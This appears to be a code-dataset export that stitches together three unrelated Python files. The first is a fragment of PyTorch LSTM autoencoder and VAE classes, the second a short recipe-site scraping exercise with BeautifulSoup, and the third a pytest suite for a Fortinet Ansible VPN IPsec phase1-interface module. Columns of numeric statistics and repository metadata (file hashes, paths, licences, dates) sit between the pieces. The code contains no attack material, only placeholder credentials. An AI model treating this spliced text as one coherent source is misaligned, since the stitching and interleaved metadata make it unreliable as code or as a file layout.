return self.linear2(x)
class lstmAE_wo_Norm(nn.Module):
def __init__(self, input_len, dim, dim_z):
super(lstmAE_wo_Norm, self).__init__()
self.encoder = lstmEncoder_wo_Norm(input_len, dim, dim_z)
self.decoder = lstmDecoder(input_len, dim, dim_z)
def forward(self, x, x_lengths):
z = self.encoder(x, x_lengths)
return [x, self.decoder(z), x_lengths]
class lstmAE(nn.Module):
def __init__(self, input_len, dim, dim_z):
super(lstmAE, self).__init__()
self.encoder = lstmEncoder(input_len, dim, dim_z)
self.decoder = lstmDecoder(input_len, dim, dim_z)
def forward(self, x, x_lengths):
z = self.encoder(x, x_lengths)
return [x, self.decoder(z), x_lengths]
class lstmAE_feedback(nn.Module):
def __init__(self, input_len, dim, dim_z, residual=False):
super(lstmAE_feedback, self).__init__()
self.encoder = lstmEncoder(input_len, dim, dim_z)
self.decoder = lstmDecoder_feedback(input_len, dim, dim_z, residual=residual)
def forward(self, x, x_lengths):
z = self.encoder(x, x_lengths)
return [x, self.decoder(z), x_lengths]
class lstmVAE(nn.Module):
def __init__(self, input_len, dim, dim_z):
super(lstmVAE, self).__init__()
self.encoder = lstmEncoder_vae(input_len, dim, dim_z)
self.decoder = lstmDecoder(input_len, dim, dim_z)
self.estimator_length = Estimator_length(dim_z)
def forward(self, x, x_lengths):
mu, log_var = self.encoder(x, x_lengths)
z = reparametrize(mu, log_var)
return [x, self.decoder(z), x_lengths, mu, log_var, z, self.estimator_length(z)]
class lstmCVAE(nn.Module):
def __init__(self, input_len, dim, dim_z, class_num):
super(lstmCVAE, self).__init__()
self.encoder = lstmEncoder_cvae(input_len, dim, dim_z, class_num)
self.decoder = lstmDecoder_c(input_len, dim, dim_z, class_num)
def forward(self, x, x_lengths, class_vector):
mu, log_var = self.encoder(x, x_lengths, class_vector)
z = reparametrize(mu, log_var)
return [x, self.decoder(z, class_vector), x_lengths, mu, log_var, z]
class lstmCVAE2(nn.Module):
def __init__(self, input_len, dim, dim_z, class_num):
super(lstmCVAE2, self).__init__()
self.encoder = lstmEncoder_cvae(input_len, dim, dim_z, class_num)
self.encoder_class = Encoder_c(dim_z, class_num)
self.decoder = lstmDecoder_c(input_len, dim, dim_z, class_num)
def forward(self, x, x_lengths, class_vector):
mu, log_var = self.encoder(x, x_lengths, class_vector)
mu_c, log_var_c = self.encoder_class(class_vector)
z = reparametrize(mu, log_var)
return [x, self.decoder(z, class_vector), x_lengths, mu, log_var, z, mu_c, log_var_c]
class lstmVAE_feedback(nn.Module):
def __init__(self, input_len, dim, dim_z, residual=False):
super(lstmVAE_feedback, self).__init__()
self.encoder = lstmEncoder_vae(input_len, dim, dim_z)
self.decoder = lstmDecoder_feedback(input_len, dim, dim_z, residual=residual)
def forward(self, x, x_lengths):
mu, log_var = self.encoder(x, x_lengths)
z = reparametrize(mu, log_var)
return [x, self.decoder(z), x_lengths, mu, log_var, z]
class lstmVAE_initfeed(nn.Module):
def __init__(self, input_len, dim, dim_z, residual=False):
super(lstmVAE_initfeed, self).__init__()
self.encoder = lstmEncoder_vae(input_len, dim, dim_z)
self.decoder = lstmDecoder_initfeed(input_len, dim, dim_z, residual=residual)
self.estimator_length = Estimator_length(dim_z)
def forward(self, x, x_lengths):
mu, log_var = self.encoder(x, x_lengths)
z = reparametrize(mu, log_var)
pose = x[:, 0, :] # batch, time, pose
return [x, self.decoder(z, pose), x_lengths, mu, log_var, z, self.estimator_length(z)]
def reparametrize(mu, log_var):
std = torch.exp(0.5 * log_var)
eps = torch.randn_like(mu)
return eps * std + mu
| 30.730878
| 105
| 0.547198
| 2,752
| 21,696
| 4.03561
| 0.042151
| 0.053665
| 0.072033
| 0.084999
| 0.928777
| 0.915181
| 0.899604
| 0.867819
| 0.865208
| 0.860886
| 0
| 0.012239
| 0.344718
| 21,696
| 705
| 106
| 30.774468
| 0.768939
| 0.010647
| 0
| 0.746562
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08055
| false
| 0
| 0.003929
| 0
| 0.165029
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b9b9d49a10df03c67b767356dd971e1272708fc6
| 689
|
py
|
Python
|
code2/day03/demo02.py
|
picktsh/python
|
0f758dcdf9eee3580d8f6e2241ef557b6320ef54
|
[
"MIT"
] | 1
|
2019-12-31T16:44:06.000Z
|
2019-12-31T16:44:06.000Z
|
code2/day03/demo02.py
|
picktsh/python
|
0f758dcdf9eee3580d8f6e2241ef557b6320ef54
|
[
"MIT"
] | null | null | null |
code2/day03/demo02.py
|
picktsh/python
|
0f758dcdf9eee3580d8f6e2241ef557b6320ef54
|
[
"MIT"
] | 1
|
2022-01-13T10:32:22.000Z
|
2022-01-13T10:32:22.000Z
|
"""
课堂练习
续写下方代码,使用find_all()语法查找最小父级标签,并把查找的结果打印出来。
不懂做?点击下面的“需要帮助”。
"""
# 引用requests库
import requests
# 引用BeautifulSoup库
from bs4 import BeautifulSoup
# 获取数据
res_foods = requests.get('http://www.xiachufang.com/explore/')
# 解析数据
bs_foods = BeautifulSoup(res_foods.text, 'html.parser')
info = bs_foods.find_all("div", class_="info pure-u")
print(info)
"""
这个,是我提供的参考答案:
"""
# 引用requests库
import requests
# 引用BeautifulSoup库
from bs4 import BeautifulSoup
# 获取数据
res_foods = requests.get('http://www.xiachufang.com/explore/')
# 解析数据
bs_foods = BeautifulSoup(res_foods.text, 'html.parser')
# 查找最小父级标签
list_foods = bs_foods.find_all('div', class_='info pure-u')
# 打印最小父级标签
print(list_foods)
| 19.685714
| 62
| 0.751814
| 93
| 689
| 5.408602
| 0.451613
| 0.063618
| 0.099404
| 0.163022
| 0.771372
| 0.771372
| 0.771372
| 0.771372
| 0.771372
| 0.648111
| 0
| 0.003231
| 0.101597
| 689
| 34
| 63
| 20.264706
| 0.80937
| 0.235123
| 0
| 0.666667
| 0
| 0
| 0.241309
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
6a422b834c2af6209f507d521976c17d66cffe6d
| 57,781
|
py
|
Python
|
v6.0.5/vpn_ipsec/test_fortios_vpn_ipsec_phase1_interface.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 14
|
2018-09-25T20:35:25.000Z
|
2021-07-14T04:30:54.000Z
|
v6.0.5/vpn_ipsec/test_fortios_vpn_ipsec_phase1_interface.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 32
|
2018-10-09T04:13:42.000Z
|
2020-05-11T07:20:28.000Z
|
v6.0.5/vpn_ipsec/test_fortios_vpn_ipsec_phase1_interface.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 11
|
2018-10-09T00:14:53.000Z
|
2021-11-03T10:54:09.000Z
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_vpn_ipsec_phase1_interface
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_vpn_ipsec_phase1_interface.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_vpn_ipsec_phase1_interface_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1_interface': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_discovery_forwarder': 'enable',
'auto_discovery_psk': 'enable',
'auto_discovery_receiver': 'enable',
'auto_discovery_sender': 'enable',
'auto_negotiate': 'enable',
'banner': 'test_value_18',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_23',
'default_gw': 'test_value_24',
'default_gw_priority': '25',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '28',
'dns_mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd_retrycount': '32',
'dpd_retryinterval': 'test_value_33',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'encap_local_gw4': 'test_value_36',
'encap_local_gw6': 'test_value_37',
'encap_remote_gw4': 'test_value_38',
'encap_remote_gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation_address': 'ike',
'enforce_unique_id': 'disable',
'exchange_interface_ip': 'enable',
'exchange_ip_addr4': 'test_value_44',
'exchange_ip_addr6': 'test_value_45',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '48',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_50',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '53',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_56',
'ip_version': '4',
'ipv4_dns_server1': 'test_value_58',
'ipv4_dns_server2': 'test_value_59',
'ipv4_dns_server3': 'test_value_60',
'ipv4_end_ip': 'test_value_61',
'ipv4_name': 'test_value_62',
'ipv4_netmask': 'test_value_63',
'ipv4_split_exclude': 'test_value_64',
'ipv4_split_include': 'test_value_65',
'ipv4_start_ip': 'test_value_66',
'ipv4_wins_server1': 'test_value_67',
'ipv4_wins_server2': 'test_value_68',
'ipv6_dns_server1': 'test_value_69',
'ipv6_dns_server2': 'test_value_70',
'ipv6_dns_server3': 'test_value_71',
'ipv6_end_ip': 'test_value_72',
'ipv6_name': 'test_value_73',
'ipv6_prefix': '74',
'ipv6_split_exclude': 'test_value_75',
'ipv6_split_include': 'test_value_76',
'ipv6_start_ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local_gw': 'test_value_80',
'local_gw6': 'test_value_81',
'localid': 'test_value_82',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'monitor': 'test_value_87',
'monitor_hold_down_delay': '88',
'monitor_hold_down_time': 'test_value_89',
'monitor_hold_down_type': 'immediate',
'monitor_hold_down_weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate_timeout': '94',
'net_device': 'enable',
'passive_mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_102',
'ppk_secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret_remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_110',
'remote_gw6': 'test_value_111',
'remotegw_ddns': 'test_value_112',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_117',
'suite_b': 'disable',
'tunnel_search': 'selectors',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1_interface.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-discovery-forwarder': 'enable',
'auto-discovery-psk': 'enable',
'auto-discovery-receiver': 'enable',
'auto-discovery-sender': 'enable',
'auto-negotiate': 'enable',
'banner': 'test_value_18',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_23',
'default-gw': 'test_value_24',
'default-gw-priority': '25',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '28',
'dns-mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd-retrycount': '32',
'dpd-retryinterval': 'test_value_33',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'encap-local-gw4': 'test_value_36',
'encap-local-gw6': 'test_value_37',
'encap-remote-gw4': 'test_value_38',
'encap-remote-gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation-address': 'ike',
'enforce-unique-id': 'disable',
'exchange-interface-ip': 'enable',
'exchange-ip-addr4': 'test_value_44',
'exchange-ip-addr6': 'test_value_45',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '48',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_50',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '53',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_56',
'ip-version': '4',
'ipv4-dns-server1': 'test_value_58',
'ipv4-dns-server2': 'test_value_59',
'ipv4-dns-server3': 'test_value_60',
'ipv4-end-ip': 'test_value_61',
'ipv4-name': 'test_value_62',
'ipv4-netmask': 'test_value_63',
'ipv4-split-exclude': 'test_value_64',
'ipv4-split-include': 'test_value_65',
'ipv4-start-ip': 'test_value_66',
'ipv4-wins-server1': 'test_value_67',
'ipv4-wins-server2': 'test_value_68',
'ipv6-dns-server1': 'test_value_69',
'ipv6-dns-server2': 'test_value_70',
'ipv6-dns-server3': 'test_value_71',
'ipv6-end-ip': 'test_value_72',
'ipv6-name': 'test_value_73',
'ipv6-prefix': '74',
'ipv6-split-exclude': 'test_value_75',
'ipv6-split-include': 'test_value_76',
'ipv6-start-ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local-gw': 'test_value_80',
'local-gw6': 'test_value_81',
'localid': 'test_value_82',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'monitor': 'test_value_87',
'monitor-hold-down-delay': '88',
'monitor-hold-down-time': 'test_value_89',
'monitor-hold-down-type': 'immediate',
'monitor-hold-down-weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate-timeout': '94',
'net-device': 'enable',
'passive-mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_102',
'ppk-secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret-remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_110',
'remote-gw6': 'test_value_111',
'remotegw-ddns': 'test_value_112',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_117',
'suite-b': 'disable',
'tunnel-search': 'selectors',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1-interface', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_vpn_ipsec_phase1_interface_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1_interface': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_discovery_forwarder': 'enable',
'auto_discovery_psk': 'enable',
'auto_discovery_receiver': 'enable',
'auto_discovery_sender': 'enable',
'auto_negotiate': 'enable',
'banner': 'test_value_18',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_23',
'default_gw': 'test_value_24',
'default_gw_priority': '25',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '28',
'dns_mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd_retrycount': '32',
'dpd_retryinterval': 'test_value_33',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'encap_local_gw4': 'test_value_36',
'encap_local_gw6': 'test_value_37',
'encap_remote_gw4': 'test_value_38',
'encap_remote_gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation_address': 'ike',
'enforce_unique_id': 'disable',
'exchange_interface_ip': 'enable',
'exchange_ip_addr4': 'test_value_44',
'exchange_ip_addr6': 'test_value_45',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '48',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_50',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '53',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_56',
'ip_version': '4',
'ipv4_dns_server1': 'test_value_58',
'ipv4_dns_server2': 'test_value_59',
'ipv4_dns_server3': 'test_value_60',
'ipv4_end_ip': 'test_value_61',
'ipv4_name': 'test_value_62',
'ipv4_netmask': 'test_value_63',
'ipv4_split_exclude': 'test_value_64',
'ipv4_split_include': 'test_value_65',
'ipv4_start_ip': 'test_value_66',
'ipv4_wins_server1': 'test_value_67',
'ipv4_wins_server2': 'test_value_68',
'ipv6_dns_server1': 'test_value_69',
'ipv6_dns_server2': 'test_value_70',
'ipv6_dns_server3': 'test_value_71',
'ipv6_end_ip': 'test_value_72',
'ipv6_name': 'test_value_73',
'ipv6_prefix': '74',
'ipv6_split_exclude': 'test_value_75',
'ipv6_split_include': 'test_value_76',
'ipv6_start_ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local_gw': 'test_value_80',
'local_gw6': 'test_value_81',
'localid': 'test_value_82',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'monitor': 'test_value_87',
'monitor_hold_down_delay': '88',
'monitor_hold_down_time': 'test_value_89',
'monitor_hold_down_type': 'immediate',
'monitor_hold_down_weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate_timeout': '94',
'net_device': 'enable',
'passive_mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_102',
'ppk_secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret_remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_110',
'remote_gw6': 'test_value_111',
'remotegw_ddns': 'test_value_112',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_117',
'suite_b': 'disable',
'tunnel_search': 'selectors',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1_interface.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-discovery-forwarder': 'enable',
'auto-discovery-psk': 'enable',
'auto-discovery-receiver': 'enable',
'auto-discovery-sender': 'enable',
'auto-negotiate': 'enable',
'banner': 'test_value_18',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_23',
'default-gw': 'test_value_24',
'default-gw-priority': '25',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '28',
'dns-mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd-retrycount': '32',
'dpd-retryinterval': 'test_value_33',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'encap-local-gw4': 'test_value_36',
'encap-local-gw6': 'test_value_37',
'encap-remote-gw4': 'test_value_38',
'encap-remote-gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation-address': 'ike',
'enforce-unique-id': 'disable',
'exchange-interface-ip': 'enable',
'exchange-ip-addr4': 'test_value_44',
'exchange-ip-addr6': 'test_value_45',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '48',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_50',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '53',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_56',
'ip-version': '4',
'ipv4-dns-server1': 'test_value_58',
'ipv4-dns-server2': 'test_value_59',
'ipv4-dns-server3': 'test_value_60',
'ipv4-end-ip': 'test_value_61',
'ipv4-name': 'test_value_62',
'ipv4-netmask': 'test_value_63',
'ipv4-split-exclude': 'test_value_64',
'ipv4-split-include': 'test_value_65',
'ipv4-start-ip': 'test_value_66',
'ipv4-wins-server1': 'test_value_67',
'ipv4-wins-server2': 'test_value_68',
'ipv6-dns-server1': 'test_value_69',
'ipv6-dns-server2': 'test_value_70',
'ipv6-dns-server3': 'test_value_71',
'ipv6-end-ip': 'test_value_72',
'ipv6-name': 'test_value_73',
'ipv6-prefix': '74',
'ipv6-split-exclude': 'test_value_75',
'ipv6-split-include': 'test_value_76',
'ipv6-start-ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local-gw': 'test_value_80',
'local-gw6': 'test_value_81',
'localid': 'test_value_82',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'monitor': 'test_value_87',
'monitor-hold-down-delay': '88',
'monitor-hold-down-time': 'test_value_89',
'monitor-hold-down-type': 'immediate',
'monitor-hold-down-weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate-timeout': '94',
'net-device': 'enable',
'passive-mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_102',
'ppk-secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret-remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_110',
'remote-gw6': 'test_value_111',
'remotegw-ddns': 'test_value_112',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_117',
'suite-b': 'disable',
'tunnel-search': 'selectors',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1-interface', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_vpn_ipsec_phase1_interface_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'vpn_ipsec_phase1_interface': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_discovery_forwarder': 'enable',
'auto_discovery_psk': 'enable',
'auto_discovery_receiver': 'enable',
'auto_discovery_sender': 'enable',
'auto_negotiate': 'enable',
'banner': 'test_value_18',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_23',
'default_gw': 'test_value_24',
'default_gw_priority': '25',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '28',
'dns_mode': 'manual',
'domain': 'test_value_30',
'dpd': 'disable',
'dpd_retrycount': '32',
'dpd_retryinterval': 'test_value_33',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'encap_local_gw4': 'test_value_36',
'encap_local_gw6': 'test_value_37',
'encap_remote_gw4': 'test_value_38',
'encap_remote_gw6': 'test_value_39',
'encapsulation': 'none',
'encapsulation_address': 'ike',
'enforce_unique_id': 'disable',
'exchange_interface_ip': 'enable',
'exchange_ip_addr4': 'test_value_44',
'exchange_ip_addr6': 'test_value_45',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '48',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_50',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '53',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_56',
'ip_version': '4',
'ipv4_dns_server1': 'test_value_58',
'ipv4_dns_server2': 'test_value_59',
'ipv4_dns_server3': 'test_value_60',
'ipv4_end_ip': 'test_value_61',
'ipv4_name': 'test_value_62',
'ipv4_netmask': 'test_value_63',
'ipv4_split_exclude': 'test_value_64',
'ipv4_split_include': 'test_value_65',
'ipv4_start_ip': 'test_value_66',
'ipv4_wins_server1': 'test_value_67',
'ipv4_wins_server2': 'test_value_68',
'ipv6_dns_server1': 'test_value_69',
'ipv6_dns_server2': 'test_value_70',
'ipv6_dns_server3': 'test_value_71',
'ipv6_end_ip': 'test_value_72',
'ipv6_name': 'test_value_73',
'ipv6_prefix': '74',
'ipv6_split_exclude': 'test_value_75',
'ipv6_split_include': 'test_value_76',
'ipv6_start_ip': 'test_value_77',
'keepalive': '78',
'keylife': '79',
'local_gw': 'test_value_80',
'local_gw6': 'test_value_81',
'localid': 'test_value_82',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'monitor': 'test_value_87',
'monitor_hold_down_delay': '88',
'monitor_hold_down_time': 'test_value_89',
'monitor_hold_down_type': 'immediate',
'monitor_hold_down_weekday': 'everyday',
'name': 'default_name_92',
'nattraversal': 'enable',
'negotiate_timeout': '94',
'net_device': 'enable',
'passive_mode': 'enable',
'peer': 'test_value_97',
'peergrp': 'test_value_98',
'peerid': 'test_value_99',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_102',
'ppk_secret': 'test_value_103',
'priority': '104',
'proposal': 'des-md5',
'psksecret': 'test_value_106',
'psksecret_remote': 'test_value_107',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_110',
'remote_gw6': 'test_value_111',
'remotegw_ddns': 'test_value_112',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_117',
'suite_b': 'disable',
'tunnel_search': 'selectors',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_122',
'vni': '123',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1_interface.fortios_vpn_ipsec(input_data, fos_instance)
delete_method_mock.assert_called_with('vpn.ipsec', 'phase1-interface', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
